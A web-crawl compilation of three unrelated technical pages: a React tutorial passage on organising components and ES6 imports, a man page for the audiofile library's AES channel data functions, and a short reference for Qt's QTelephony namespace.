React components allow you to do the same thing for the UI: group elements together and give them a name. In this case, we've organized our
h2 and
span React elements into a React component called
RepLogApp. React components are sort of a named container for elements.
By the way, React components do have one rule: their names must start with a capital letter. Actually, this rule is there to help JSX: if we tried using a
<repLogApp /> component with a lowercase "r", JSX would actually think we wanted to create some new hipster
repLogApp HTML element, just like how a
<div> becomes a
<div>. By starting the component name with a capital letter, JSX realizes we're referring to our component class, not some hipster HTML element with that name.
Anyways, a few minor housekeeping things. Notice that
Component is a property on the
React object. The way we have things now is fine. But, commonly, you'll see React imported like this:
import React then
{ Component } from
react. Thanks to this, you can just extend
Component.
This is pretty much just a style thing. And... honestly... it's one of the things that can make React frustrating. What I mean is, React developers like to use a lot of the newer, fancier ES6 syntaxes. In this case, the
react module exports an object that has a
Component property. This syntax is "object destructuring": it grabs the
Component key from the object and assigns it to a new
Component variable. Really, this syntax is not that advanced, and actually, we're going to use it a lot. But, this is one of the challenges with React: you may not be confused by React, you may be confused by a fancy syntax used in a React app. And we definitely don't want that!
We can do the same thing with
react-dom. Because, notice, we're only using the
render key. So instead of importing all of
react-dom, import
{ render } from
react-dom. Below, use the
render() function directly.
This change is a little bit more important because Webpack should be smart enough to perform something called "tree shaking". That's not because Webpack hates nature, that's just a fancy way of saying that Webpack will realize that we only need the
render() function from
react-dom: not the whole module. And so, it will only include the code needed for
render in our final JavaScript file.
Anyways, these are just fancier ways to import exactly what we already had.
Oh, but, notice: it looks like the
React variable is now an unused import. What I mean is, we don't ever use that variable. So, couldn't we just remove it and only import
Components?
Actually, no! Remember: the JSX code is transformed into
React.createElement(). So, strangely enough, we are still using the
React variable, even though it doesn't look like it. Sneaky React.
To make sure we haven't broken anything... yet, go back and refresh. All good.
Just like in PHP, we're going to follow a pattern where each React component class lives in its own file. In the
assets/js directory, create a new
RepLog directory: this will hold all of the code for our React app. Inside, create a new file called
RepLogApp. Copy our entire component class into that file.
Woh. Something weird just happened. Did you see it? We only copied the
RepLogApp class. But when we pasted, PhpStorm auto-magically added the import for us! Thanks PhpStorm! Gold star!
But, check out this error:
ESLint: React must be in scope when using JSX.
Oh, that's what we just talked about! This is one of those warnings that comes from ESLint. Update the import to also import
React.
Now, to make this class available to other files, use
export default class RepLogApp.
Back in
rep_log_react.js, delete the class and, instead,
import RepLogApp from
./RepLog/RepLogApp. Oh, and it's not too important, but we're actually not using the
Component import anymore. So, trash it.
Awesome! Our code is a bit more organized! And when we refresh, it's not broken, which is always my favorite.
And actually, this is an important moment because we've just established a basic structure for pretty much any React app. First, we have the entry file -
rep_log_react.js - and it has just one job: render our top level React component. In this case, it renders
RepLogApp. That's the only file that it needs to render because eventually, the
RepLogApp component will contain our entire app.
So the structure is: the one entry file renders the one top-level React component, and it returns all the elements we need from its
render() method.
And, that's our next job: to build out the rest of the app in
RepLogApp. But first, we need to talk about a super-duper important concept called props. | https://symfonycasts.com/screencast/reactjs/react-component | CC-MAIN-2018-47 | en | refinedweb |
Provided by: libaudiofile-dev_0.3.6-2ubuntu0.15.10.1_amd64
NAME
afInitAESChannelDataTo, afInitAESChannelData - initialize AES non-audio data in an audio file setup
SYNOPSIS
#include <audiofile.h> void afInitAESChannelDataTo(AFfilesetup setup, int track, int willHaveData); void afInitAESChannelData(AFfilesetup setup, int track);
PARAMETERS
setup is a valid file setup returned by afNewFileSetup(3). track specifies a track within the audio file setup. track is always AF_DEFAULT_TRACK for all currently supported file formats. willHaveData is a boolean-valued integer indicating whether AES non-audio data will be present.
DESCRIPTION
Given an AFfilesetup structure created with afNewFileSetup(3) and a track identified by track (AF_DEFAULT_TRACK for all currently supported file formats), afInitAESChannelDataTo initializes the track to contain or not contain AES non-audio data. afInitAESChannelData behaves similarly but always initializes the track to contain AES non-audio data. Currently only AIFF and AIFF-C file formats can store AES non-audio data; this data is ignored in all other file formats.
ERRORS
afInitAESChannelDataTo and afInitAESChannelData can produce the following errors: AF_BAD_FILESETUP setup represents an invalid file setup. AF_BAD_TRACKID track represents an invalid track identifier.
SEE ALSO
afNewFileSetup(3)
AUTHOR
Michael Pruett <michael@68k.org> | http://manpages.ubuntu.com/manpages/xenial/en/man3/afInitAESChannelData.3.html | CC-MAIN-2018-47 | en | refinedweb |
Technic235 answered
Sep 23, '18
c#·start·startcoroutine·stopcoroutine·co-routine
5 Replies
13 Votes
ausernme commented
Sep 14, '18
coroutine·namespace·startcoroutine·not found
2 Replies
0 Votes
jashan answered
Aug 27, '18
invokerepeating·startcoroutine
4 Replies
6 Votes
myzzie answered
Aug 20, '18
startcoroutine
1 Reply
behshad_yaghoubi edited
Aug 2, '18
in Help Room
0 Replies
AdityaViaxor answered
Jul 12, '18
collision·trigger·startcoroutine·coin
3 Replies
1 Votes
esraahamad97 edited
Jun 30, '18
in Help Room
Thomas-Hawk edited
Jun 25, '18
coroutine·ienumerator·startcoroutine·iterate·garbage collection
IWannaTaco asked
Jun 15, '18
in Help Room
b2hinkle asked
Jun 12, '18
c#·instantiate·spawn·ienumerator·startcoroutine
UnbreakableOne answered
Jun 11, '18
c#·coroutine·ienumerator·startcoroutine·coroutine errors
kordou edited
Mar 29, '18
in Help Room
TreyH commented
Mar 14, '18
coroutine·coroutines·startcoroutine·enumerate
Capricornum commented
Feb 14, '18
in Help Room
spokrock answered
Feb 11, '18
coroutine·start·startcoroutine·monobehavior
5 Votes
Harinezumi commented
Feb 9, '18
c#·www·coroutines·mysql·startcoroutine
Obsessi0n commented
Feb 2, '18
in Help Room
jayadratha commented
Jan 9, '18
dontdestroyonload·startcoroutine
jamessmith2012 commented
Jan 5, '18
in Help Room
megabrobro commented
Dec 21, '17
unity 5·coroutine·coroutines·startcoroutine
Bonfire-Boy commented
Dec 15, '17
startcoroutine
aldonaletto edited
Dec 1, '17
coroutine·startcoroutine·stack
AmrmHady answered
Nov 12, '17
in Help Room
2 Votes
ppizarro answered
Oct 23, '17
in Help Room
DJJD commented
Oct 17, '17
waitforseconds·coroutines·startcoroutine·yield waitforseconds·stopcoroutine
Skurlexx answered
Oct 7, '17
startcoroutine
tmalhassan commented
Oct 4, '17
c#·waitforseconds·method·startcoroutine
tomhendriks1102 answered
Sep 28, '17
coroutine·string·method·startcoroutine·stopcoroutine
goutham12 answered
Sep 27, '17
c#·unity 5·coroutine·startcoroutine
akashif asked
Aug. | https://answers.unity.com/topics/startcoroutine.html | CC-MAIN-2018-47 | en | refinedweb |
Testing is a crucial part in the business of software development. It ensures performance and quality of the product. The Java platform supports many testing frameworks. Spring introduces the principle of dependency injection on unit testing and has first-class support for integration testing. This article tries to give a quick introductory idea about the testing support provided by the Spring framework and how it is applied with Spring Boot.
An Overview
Testing is a process that ensures that the quality of the software adheres to the standard laid down by the requirements specification and performs smoothly with the fewest possible glitches. For this, a technique called unit testing is the simplest to achieve and can be applied on all applications in their development. Unit testing allows each component of the application to be tested separately. Further, when these individual components are integrated and tested to ensure that multiple components collaborate to work well in the system, it is called integration testing.
In a development environment, usually test codes are written separately and are not mixed with the normal code. In fact, testing a program is distinctly a separate project and is stored in a separate directory. The tests constitute test cases that are applied to test the application manually or automatically. Automated test cases are applied repeatedly at different phases of the software development process. This, by the way, is the most recommended process of the Agile framework. And Spring, being a proponent of the framework, readily supports it.
Java is never lacking in support and has numerous testing frameworks—such as JUnit, TestNG, Mockito, and so forth—at its disposal. They also go pretty well with Spring, yet perhaps the distinctive quality is Spring's incorporation of IoC into the game.
Unit Testing
The major advantage of applying dependency injection is that it makes a program code much easier to be tested because the code is much less dependent on the container, as may be the case with other development. The POJOs are individually testable by simple instantiation without adhering to any dependency. Sometimes, the fine line between unit and integration testing overlaps at the best interest of testing and we need to go beyond unit testing and start performing integration testing without deploying the application or connecting to another infrastructure. In such a case, we can mock objects to obtain the value of integration yet test our code in isolation. For example, we can test a service layer or a controller by stubbing or mocking DAO objects, without actually accessing the persistent data.
The Spring framework provides numerous mock objects and support classes. Some of them are as follows.
Mock Objects
The package called org.springframework.mock.env contains classes that are useful for creating out-of-container unit tests that depend on environment specific properties:
- MockEnvironment: This class is a mock implementation of the Environment interface.
- MockPropertySource: This class is a mock implementation of the PropertySource abstract class.
The org.springframework.mock.jndi package contains classes which can be used to set up a JNDI environment for test suites or standalone applications.
- ExpectedLookupTemplate: An extension of JndiTemplate and essentially creates a mock object of its type.
- SimpleNamingContext: Implementation of JNDI naming context that binds plain objects to String names for a test environment as well as standalone applications.
- SimpleNamingContextBuilder: This is an essentially a builder pattern class of the SimpleNamingContext.
There are several classes under org.springframework.mock.web. These classes enable us to create a comprehensive mock object for Servlet APIs. These mock objects are particularly useful for testing Web context, controllers, and filters.
The classes in the org.springframework.mock.http.server.reactive package help in creating a mock for ServerHttpRequest and ServerHttpResponse for WebFlux applications.
Apart from these, there are quite a number of utility classes in the org.springframework.test.util package, such as the ReflectionTestUtils, which is a collection for reflection-based utility methods used in both unit and integration testing. The ModelAndViewAssert class contained in org.springframework.test.web can be used to test Spring MVC ModelAndView objects.
Integration Testing
The Spring support for integration testing enables one to perform integration testing without actually deploying the application server or connecting to other dependent infrastructures. This is a huge plus point because it enables us to test the wiring of Spring IoC container contexts. Also, for example, we can test data source accessibility, or SQL statements by using JDBC, an ORM tool. The package org.springframework.test container has all the required classes for integration testing with the Spring container.
Spring Boot
Spring Boot provides a set of utilities and annotation to help in the process of unit and integration testing and, of course, makes life easier. The core items for the testing are contained in the modules called spring-boot-test and the configuration is provided by the modules called spring-boot-test-autoconfigure.
We can simply use the spring-boot-starter-test in pom.xml and transitively pull all the required dependencies in a Spring application. The support libraries for testing as pulled by the Maven file are as follows:
- JUnit: It is the standard Java unit testing framework which provides an up-to-date foundation for developer-side testing on the JVM.
- Spring Test: Utilities and Integration support for Spring Boot applications.
- AssertJ: A set of assertions to provide meaningful error messages that leverage readability and easy debugging.
- Hamcrest: Provides a library of matcher object that helps in creating flexible expressions.
- Mockito: Java Mocking framework.
- JSONassert: Helps in writing JSON unit test and testing REST interfaces.
- JsonPath: Xpath for Json.
Spring Boot provides a volley of annotation to designate a test class and test specific parts of an application. For example, we can use @SpringBootTest annotation to enable Spring Boot test features. This annotation loads ApplicationContext used in a test, through SpringApplication. Typically, the @SpringBootTest annotation is used in association with @RunWith(SpringRunner.class) and does a whole lot of thing behind the scene apart from just loading ApplicationContext and having spring beans auto wired to the test instances. The @SpringBootTest does not start the server by default. As a result, to test Web endpoints, we can use a mock environment as follows.
Here is a code snippet to illustrate the idea.
package org.springboot.app; import static org.springframework.test.web.servlet .request.MockMvcRequestBuilders.*; import org.junit.*; import org.junit.runner.RunWith; import org.springboot.app.controller.*; org.springframework.test.web.servlet .setup.MockMvcBuilders; @RunWith(SpringRunner.class) @SpringBootTest @AutoConfigureMockMvc public class SpringbootApp1ApplicationTests { private MockMvc mock; @Before public void init() { mock = MockMvcBuilders .standaloneSetup(new BookController()).build(); } @Test public void testBookList() throws Exception { mock.perform(get("/")).andExpect(status() .isOk()).andExpect(view().name("bookList")) .andDo(print()); } // ... }
Conclusion
The Spring test framework integrates well with test frameworks such as Junit, Mockito, and so on. As a result, unit and integration testing becomes easy with a more meaningful outcome. Springs makes it simpler by leveraging annotation-based support. For example, to unit and integration test the Spring TestContext framework, we can use @RunWith, @WebAppConfiguration, and @ContextConfiguration to load a Spring configuration and inject WebApplicationContext into the MockMvc.
This write-up is just a tip of the iceberg and provides a glimpse of what Spring offers with respect to unit and integration testing. Refer to the following links for a more elaborate explanation on this topic. | https://mobile.developer.com/java/data/what-is-spring-testing.html | CC-MAIN-2018-47 | en | refinedweb |
POSIX_SPAWNATTR_GETP... NetBSD Library Functions ManualPOSIX_SPAWNATTR_GETP...Powered by man-cgi (2021-03-02). Maintained for NetBSD by Kimmo Suominen. Based on man-cgi by Panagiotis Christias.
NAME
posix_spawnattr_getpgroup, posix_spawnattr_setpgroup -- get and set the spawn-pgroup attribute of a spawn attributes object
LIBRARY
Standard C Library (libc, -lc)
SYNOPSIS
#include <spawn.h> int posix_spawnattr_getpgroup(const posix_spawnattr_t *restrict attr, pid_t *restrict pgroup); int posix_spawnattr_setpgroup(posix_spawnattr_t *attr, pid_t pgroup);
DESCRIPTION.
RETURN VALUES
The posix_spawnattr_getpgroup() and posix_spawnattr_setpgroup() functions return zero.
SEE ALSO
posix_spawn(3), posix_spawnattr_destroy(3), posix_spawnattr_init(3), posix_spawnp(3)
STANDARDS
The posix_spawnattr_getpgroup() and posix_spawnattr_setpgroup() functions conform to IEEE Std 1003.1-2001 (``POSIX.1'').
HISTORY
The posix_spawnattr_getpgroup() and posix_spawnattr_setpgroup() functions first appeared in FreeBSD 8.0 and imported for NetBSD 6.0.
AUTHORS
Ed Schouten <ed@FreeBSD.org> NetBSD 9.99 December 20, 2011 NetBSD 9.99 | https://man.netbsd.org/iamd64/posix_spawnattr_setpgroup.3 | CC-MAIN-2021-17 | en | refinedweb |
Get the highlights in your inbox every week.
An introduction to monitoring with Prometheus | Opensource.com
An introduction to monitoring with Prometheus
Prometheus is a popular and powerful toolkit to monitor Kubernetes. This is a tutorial on how to get started.
Subscribe now
Metrics are the primary way to represent both the overall health of your system and any other specific information you consider important for monitoring and alerting or observability. Prometheus is a leading open source metric instrumentation, collection, and storage toolkit built at SoundCloud beginning in 2012. Since then, it's graduated from the Cloud Native Computing Foundation and become the de facto standard for Kubernetes monitoring. It has been covered in some detail in:
- Getting started with Prometheus
- 5 examples of Prometheus monitoring success
- Achieve high-scale application monitoring with Prometheus
- Tracking the weather with Python and Prometheus
However, none of these articles focus on how to use Prometheus on Kubernetes. This article:
- Describes the Prometheus architecture and data model to help you understand how it works and what it can do
- Provides a tutorial on setting Prometheus up in a Kubernetes cluster and using it to monitor clusters and applications
Architecture
While knowing how Prometheus works may not be essential to using it effectively, it can be helpful, especially if you're considering using it for production. The Prometheus documentation provides this graphic and details about the essential elements of Prometheus and how the pieces connect together.
For most use cases, you should understand three major components of Prometheus:
- The Prometheus server scrapes and stores metrics. Note that it uses a persistence layer, which is part of the server and not expressly mentioned in the documentation. Each node of the server is autonomous and does not rely on distributed storage. I'll revisit this later when looking to use a dedicated time-series database to store Prometheus data, rather than relying on the server itself.
- The web UI allows you to access, visualize, and chart the stored data. Prometheus provides its own UI, but you can also configure other visualization tools, like Grafana, to access the Prometheus server using PromQL (the Prometheus Query Language).
- Alertmanager sends alerts from client applications, especially the Prometheus server. It has advanced features for deduplicating, grouping, and routing alerts and can route through other services like PagerDuty and OpsGenie.
The key to understanding Prometheus is that it fundamentally relies on scraping, or pulling, metrics from defined endpoints. This means that your application needs to expose an endpoint where metrics are available and instruct the Prometheus server how to scrape it (this is covered in the tutorial below). There are exporters for many applications that do not have an easy way to add web endpoints, such as Kafka and Cassandra (using the JMX exporter).
Data modelNow that you understand how Prometheus works to scrape and store metrics, the next thing to learn is the kinds of metrics Prometheus supports. Some of the following information (noted with quotation marks) comes from the metric types section of the Prometheus documentation.
Counters and gauges
The two simplest metric types are counter and gauge. When getting started with Prometheus (or with time-series monitoring more generally), these are the easiest types to understand because it's easy to connect them to values you can imagine monitoring, like how much system resources your application is using or how many events it has processed.
"A counter is a cumulative metric that represents a single monotonically increasing counter whose value can only increase or be reset to zero on restart. For example, you can use a counter to represent the number of requests served, tasks completed, or errors."
Because you cannot decrease a counter, it can and should be used only to represent cumulative metrics.
"A gauge is a metric that represents a single numerical value that can arbitrarily go up and down. Gauges are typically used for measured values like [CPU] or current memory usage, but also 'counts' that can go up and down, like the number of concurrent requests."
Histograms and summaries
Prometheus supports two more complex metric types: histograms and summaries. There is ample opportunity for confusion here, given that they both track the number of observations and the sum of observed values. One of the reasons you might choose to use them is that you need to calculate an average of the observed values. Note that they create multiple time series in the database; for example, they each create a sum of the observed values with a _sum suffix.
"A histogram samples observations (usually things like request durations or response sizes) and counts them in configurable buckets. It also provides a sum of all observed values."
This makes it an excellent candidate to track things like latency that might have a service level objective (SLO) defined against it. From the documentation:
You might have an SL)
Returning to definitions:
"Similar to a histogram, a summary samples observations (usually things like request durations and response sizes). While it also provides a total count of observations and a sum of all observed values, it calculates configurable quantiles over a sliding time window."_quantile() function.
If you are still confused, I suggest taking the following approach:
- Use gauges most of the time for straightforward time-series metrics.
- Use counters for things you know to increase monotonically, e.g., if you are counting the number of times something happens.
- Use histograms for latency measurements with simple buckets, e.g., one bucket for "under SLO" and another for "over SLO."
This should be sufficient for the overwhelming majority of use cases, and you should rely on a statistical analysis expert to help you with more advanced scenarios.
Now that you have a basic understanding of what Prometheus is, how it works, and the kinds of data it can collect and store, you're ready to begin the tutorial.
Prometheus and Kubernetes hands-on tutorial
This tutorial covers the following:
- Installing Prometheus in your cluster
- Downloading the sample application and reviewing the code
- Building and deploying the app and generating load against it
- Accessing the Prometheus UI and reviewing the basic metrics
This tutorial assumes:
- You already have a Kubernetes cluster deployed.
- You have configured the kubectl command-line utility for access.
- You have the cluster-admin role (or at least sufficient privileges to create namespaces and deploy applications).
- You are running a Bash-based command-line interface. Adjust this tutorial if you run other operating systems or shell environments.
If you don't have Kubernetes running yet, this Minikube tutorial is an easy way to set it up on your laptop.
If you're ready now, let's go.
Install Prometheus
In this section, you will clone the sample repository and use Kubernetes' configuration files to deploy Prometheus to a dedicated namespace.
- Clone the sample repository locally and use it as your working directory:$ git clone
$ cd prometheus-demo
$ WORKDIR=$(pwd)
- Create a dedicated namespace for the Prometheus deployment:
$ kubectl create namespace prometheus
- Give your namespace the cluster reader role:$ kubectl apply -f $WORKDIR/kubernetes/clusterRole.yaml
clusterrole.rbac.authorization.k8s.io/prometheus created
clusterrolebinding.rbac.authorization.k8s.io/prometheus created
- Create a Kubernetes configmap with scraping and alerting rules:$ kubectl apply -f $WORKDIR/kubernetes/configMap.yaml -n prometheus
configmap/prometheus-server-conf created
- Deploy Prometheus:$ kubectl create -f prometheus-deployment.yaml -n prometheus
deployment.extensions/prometheus-deployment created
- Validate that Prometheus is running:$ kubectl get pods -n prometheus
NAME READY STATUS RESTARTS AGE
prometheus-deployment-78fb5694b4-lmz4r 1/1 Running 0 15s
Review basic metrics
In this section, you'll access the Prometheus UI and review the metrics being collected.
- Use port forwarding to enable web access to the Prometheus UI locally:
Note: Your prometheus-deployment will have a different name than this example. Review and replace the name of the pod from the output of the previous command.$ kubectl port-forward prometheus-deployment-7ddb99dcb-fkz4d 8080:9090 -n prometheus
Forwarding from 127.0.0.1:8080 -> 9090
Forwarding from [::1]:8080 -> 9090
- Go to in a browser:
You are now ready to query Prometheus metrics!
- Some basic machine metrics (like the number of CPU cores and memory) are available right away. For example, enter machine_memory_bytes in the expression field, switch to the Graph view, and click Execute to see the metric charted:
- Containers running in the cluster are also automatically monitored. For example, enter rate(container_cpu_usage_seconds_total{container_name="prometheus"}[1m]) as the expression and click Execute to see the rate of CPU usage by Prometheus:
Now that you know how to install Prometheus and use it to measure some out-of-the-box metrics, it's time for some real monitoring.
Golden signals
As described in the "Monitoring Distributed Systems" chapter of Google's SRE book:
"The four golden signals of monitoring are latency, traffic, errors, and saturation. If you can only measure four metrics of your user-facing system, focus on these four."
The book offers thorough descriptions of all four, but this tutorial focuses on the three signals that most easily serve as proxies for user happiness:
- Traffic: How many requests you're receiving
- Error rate: How many of those requests you can successfully serve
- Latency: How quickly you can serve successful requests
As you probably realize by now, Prometheus does not measure any of these for you; you'll have to instrument any application you deploy to emit them. Following is an example implementation.
Open the $WORKDIR/node/golden_signals/app.js file, which is a sample application written in Node.js (recall we cloned yuriatgoogle/prometheus-demo and exported $WORKDIR earlier). Start by reviewing the first section, where the metrics to be recorded are defined:
// total requests - counter
const nodeRequestsCounter = new prometheus.Counter({
name: 'node_requests',
help: 'total requests'
});
The first metric is a counter that will be incremented for each request; this is how the total number of requests is counted:
// failed requests - counter
const nodeFailedRequestsCounter = new prometheus.Counter({
name: 'node_failed_requests',
help: 'failed requests'
});
The second metric is another counter that increments for each error to track the number of failed requests:
// latency - histogram
const nodeLatenciesHistogram = new prometheus.Histogram({
name: 'node_request_latency',
help: 'request latency by path',
labelNames: ['route'],
buckets: [100, 400]
});
The third metric is a histogram that tracks request latency. Working with a very basic assumption that the SLO for latency is 100ms, you will create two buckets: one for 100ms and the other 400ms latency.
The next section handles incoming requests, increments the total requests metric for each one, increments failed requests when there is an (artificially induced) error, and records a latency histogram value for each successful request. I have chosen not to record latencies for errors; that implementation detail is up to you.
app.get('/', (req, res) => {
// start latency timer
const requestReceived = new Date().getTime();
console.log('request made');
// increment total requests counter
nodeRequestsCounter.inc();
// return an error 1% of the time
if ((Math.floor(Math.random() * 100)) == 100) {
// increment error counter
nodeFailedRequestsCounter.inc();
// return error code
res.send("error!", 500);
}
else {
// delay for a bit
sleep.msleep((Math.floor(Math.random() * 1000)));
// record response latency
const responseLatency = new Date().getTime() - requestReceived;
nodeLatenciesHistogram
.labels(req.route.path)
.observe(responseLatency);
res.send("success in " + responseLatency + " ms");
}
})
Test locally
Now that you've seen how to implement Prometheus metrics, see what happens when you run the application.
- Install the required packages:$ cd $WORKDIR/node/golden_signals
$ npm install --save
- Launch the app:
$ node app.js
- Open two browser tabs: one to and another to.
- When you go to the /metrics page, you can see the Prometheus metrics being collected and updated every time you reload the home page:
You're now ready to deploy the sample application to your Kubernetes cluster and test your monitoring.
Deploy monitoring to Prometheus on Kubernetes
Now it's time to see how metrics are recorded and represented in the Prometheus instance deployed in your cluster by:
- Building the application image
- Deploying it to your cluster
- Generating load against the app
- Observing the metrics recorded
Build the application image
The sample application provides a Dockerfile you'll use to build the image. This section assumes that you have:
- Docker installed and configured locally
- A Docker Hub account
- Created a repository
If you're using Google Kubernetes Engine to run your cluster, you can use Cloud Build and the Google Container Registry instead.
- Switch to the application directory:
$ cd $WORKDIR/node/golden_signals
- Build the image with this command:
$ docker build . --tag=<Docker username>/prometheus-demo-node:latest
- Make sure you're logged in to Docker Hub:
$ docker login
- Push the image to Docker Hub using this command:
$ docker push <username>/prometheus-demo-node:latest
- Verify that the image is available:
$ docker images
Deploy the application
Now that the application image is in the Docker Hub, you can deploy it to your cluster and run the application.
- Modify the $WORKDIR/node/golden_signals/prometheus-demo-node.yaml file to pull the image from Docker Hub:spec:
containers:
- image: docker.io/<Docker username>/prometheus-demo-node:latest
- Deploy the image:$ kubectl apply -f $WORKDIR/node/golden_signals/prometheus-demo-node.yaml
deployment.extensions/prometheus-demo-node created
- Verify that the application is running:$ kubectl get pods
NAME READY STATUS RESTARTS AGE
prometheus-demo-node-69688456d4-krqqr 1/1 Running 0 65s
- Expose the application using a load balancer:$ kubectl expose deployment prometheus-node-demo --type=LoadBalancer --name=prometheus-node-demo --port=8080
service/prometheus-demo-node exposed
- Confirm that your service has an external IP address:$ kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.39.240.1 <none> 443/TCP 23h
prometheus-demo-node LoadBalancer 10.39.248.129 35.199.186.110 8080:31743/TCP 78m
Generate load to test monitoring
Now that your service is up and running, generate some load against it by using Apache Bench.
- Get the IP address of your service as a variable:
$ export SERVICE_IP=$(kubectl get svc prometheus-demo-node -ojson | jq -r '.status.loadBalancer.ingress[].ip')
- Use ab to generate some load. You may want to run this in a separate terminal window.
$ ab -c 3 -n 1000{SERVICE_IP}:8080/
Review metrics
While the load is running, access the Prometheus UI in the cluster again and confirm that the "golden signal" metrics are being collected.
- Establish a connection to Prometheus:$ kubectl get pods -n prometheus
NAME READY STATUS RESTARTS AGE
prometheus-deployment-78fb5694b4-lmz4r 1/1 Running 0 15s
$ kubectl port-forward prometheus-deployment-78fb5694b4-lmz4r 8080:9090 -n prometheus
Forwarding from 127.0.0.1:8080 -> 9090
Forwarding from [::1]:8080 -> 9090
Note: Make sure to replace the name of the pod in the second command with the output of the first.
- Open in a browser:
- Use this expression to measure the request rate:
rate(node_requests[1m])
- Use this expression to measure your error rate:
rate(node_failed_requests[1m])
- Finally, use this expression to validate your latency SLO. Remember that you set up two buckets, 100ms and 400ms. This expression returns the percentage of requests that meet the SLO :
sum(rate(node_request_latency_bucket{le="100"}[1h])) / sum(rate(node_request_latency_count[1h]))
About 10% of the requests are within SLO. This is what you should expect since the code sleeps for a random number of milliseconds between 0 and 1,000. As such, about 10% of the time, it returns in more than 100ms, and this graph shows that you can't meet the latency SLO as a result.
Summary
Congratulations! You've completed the tutorial and hopefully have a much better understanding of how Prometheus works, how to instrument your application with custom metrics, and how to use it to measure your SLO compliance. The next article in this series will look at another metric instrumentation approach using OpenCensus. | https://opensource.com/article/19/11/introduction-monitoring-prometheus | CC-MAIN-2021-17 | en | refinedweb |
I am working on a project with a kl82 frdm board that will use the LPUART API to send "non blocking" data intermittently as well as be able to receive data through interrupt. I am using the LPUART_TransferSendNonBlocking function to send packets of data, but I also want to use the LPUART_IRQHandler whenever a byte is received. It seems that I can use the two separately, but I cannot use them together. I have seen some examples that use the LPUART_TransferReceiveNonBlocking function in order to receive bytes but the packets that are expected to receive are different lengths and I believe the callback function will only trigger once that amount of bytes has been received.
My example provided basically sends 26 bytes using the LPUART_TransferSendNonBlocking function, send one byte in the callback, and repeats every half a second. I want to be able to receive bytes on interrupt though with the LPUART1_IRQHandler function.
If anyone knows why this method doesn't work or knows of a better solution using this API please let me know!
Thanks,
Ronnie
Hi
Have you tried using the ring buffer to receive data?
First create handle using LPUART_TransferCreateHandle
For tx, call LPUART_TransferSendNonBlocking to send fixed length of data
For rx, call LPUART_TransferStartRingBuffer to start ring buffer, the received data will be stored in ring buffer first, then if you want to read data from ring buffer, call LPUART_TransferGetRxRingBufferLength to get currently how many data is avaliable in rb(x bytes), then call LPUART_TransferReceiveNonBlocking to read x bytes out of rb.
Yes I have looked at this example and seen the function with the following parameters as well:
LPUART_TransferReceiveNonBlocking(DEMO_LPUART, &g_lpuartHandle, &receiveXfer, NULL);
The problem I have with using this function is that receiveXfer needs a "dataSize" attached to it to indicate how many bytes are to be received before calling the interrupt. The data packets that I expect to receive in my protocol varies from a single byte up to 256 bytes and any in between. I would ideally want to have the interrupt called for each byte or once the last byte is received- but there is no way of knowing when the last byte will be received.
Hi ronald_j_chasse,
Thanks for your updated information.
If you don't want this type API, and want to receive your own protocol varies from a single bye upto any bytes, I think you can just enable the Receive Interrupt to receive the UART data. Then you can design your own Interrupt ISR, in the UART ISR, you can use the counter to count your received data.
This is a very common customer's usage.
From the UART module side, after you enable the UART to receive an interrupt when one UART data is coming, then it will trigger one UART receive interrupt, in the UART ISR, you just need to check whether the interrupt is caused by the received interrupt, then you can do your own code.
You totally can don't use the LPUART_TransferReceiveNonBlocking API, you can write your own API, just to enable the receive interrupt, then in the ISR do your own code..
-----------------------------------------------------------------------------
Thanks for your input! I still have some questions though.
I still want to use the LPUART_TransferSendNonBlocking function from the API. I do not know how to use the receive interrupt or create my own ISR for it. I have used the LPUART1_IRQHandler ISR to handle the received bytes, but it seems like I cannot use it while using the LPUART_TransferSendNonBlocking function. I want to be able to use BOTH the LPUART_TransferSendNonBlocking function AND some kind of interrupt for receiving 1 byte at a time.
Thanks!
Hi ronald_j_chasse,
If you want to enable both the TX and RX interrupt, you just need to enable both LPUARTx_CTRL[TIE] and LPUARTx_CTRL[RIE], more details, please check the CTRL register description in the KL82 reference manual.
So, you can use this API:
LPUART_EnableInterrupts(base, kLPUART_TxDataRegEmptyInterruptEnable | kLPUART_RxDataRegFullInterruptEnable);
About the interrupt, please check :
static void HAL_UartInterruptHandle(uint8_t instance) { hal_uart_state_t *uartHandle = s_UartState[instance]; uint32_t status; if (NULL == uartHandle) { return; } status = LPUART_GetStatusFlags(s_LpuartAdapterBase[instance]); /* Receive data register full */ if ((LPUART_STAT_RDRF_MASK & status) && (LPUART_GetEnabledInterrupts(s_LpuartAdapterBase[instance]) & kLPUART_RxDataRegFullInterruptEnable)) { if (uartHandle->rx.buffer) { uartHandle->rx.buffer[uartHandle->rx.bufferSofar++] = LPUART_ReadByte(s_LpuartAdapterBase[instance]); if (uartHandle->rx.bufferSofar >= uartHandle->rx.bufferLength) { LPUART_DisableInterrupts(s_LpuartAdapterBase[instance], kLPUART_RxDataRegFullInterruptEnable | kLPUART_RxOverrunInterruptEnable); if (uartHandle->callback) { uartHandle->rx.buffer = NULL; uartHandle->callback(uartHandle, kStatus_HAL_UartRxIdle, uartHandle->callbackParam); } } } } /* Send data register empty and the interrupt is enabled. */ if ((LPUART_STAT_TDRE_MASK & status) && (LPUART_GetEnabledInterrupts(s_LpuartAdapterBase[instance]) & kLPUART_TxDataRegEmptyInterruptEnable)) { if (uartHandle->tx.buffer) { LPUART_WriteByte(s_LpuartAdapterBase[instance], uartHandle->tx.buffer[uartHandle->tx.bufferSofar++]); if (uartHandle->tx.bufferSofar >= uartHandle->tx.bufferLength) { LPUART_DisableInterrupts(s_LpuartAdapterBase[uartHandle->instance], kLPUART_TxDataRegEmptyInterruptEnable); if (uartHandle->callback) { uartHandle->tx.buffer = NULL; uartHandle->callback(uartHandle, kStatus_HAL_UartTxIdle, uartHandle->callbackParam); } } } } #if 1 LPUART_ClearStatusFlags(s_LpuartAdapterBase[instance], status); #endif } #endif #endif
You also can do the operation in the callback function..
----------------------------------------------------------------------------- | https://community.nxp.com/t5/MCUXpresso-SDK/KL82-LPUART-Tx-Send-Non-Blocking-and-Rx-Interrupt/td-p/1140658 | CC-MAIN-2021-17 | en | refinedweb |
The QTelephony namespace contains telephony-related enumerated type definitions. More...
#include <QTelephony>
Inherits QObject.
The QTelephony namespace contains telephony-related enumerated type definitions.
Class of call to effect with a call forwarding, call barring, or call waiting change.
Availability of a network operator within QNetworkRegistration::AvailableOperator.
Mode that was requested when the operator was selected.
Indicates the current network registration state.
Result codes for telephony operations, based on the GSM specifications.
Error codes for SIM file operations via QBinarySimFile and QRecordBasedSimFile.
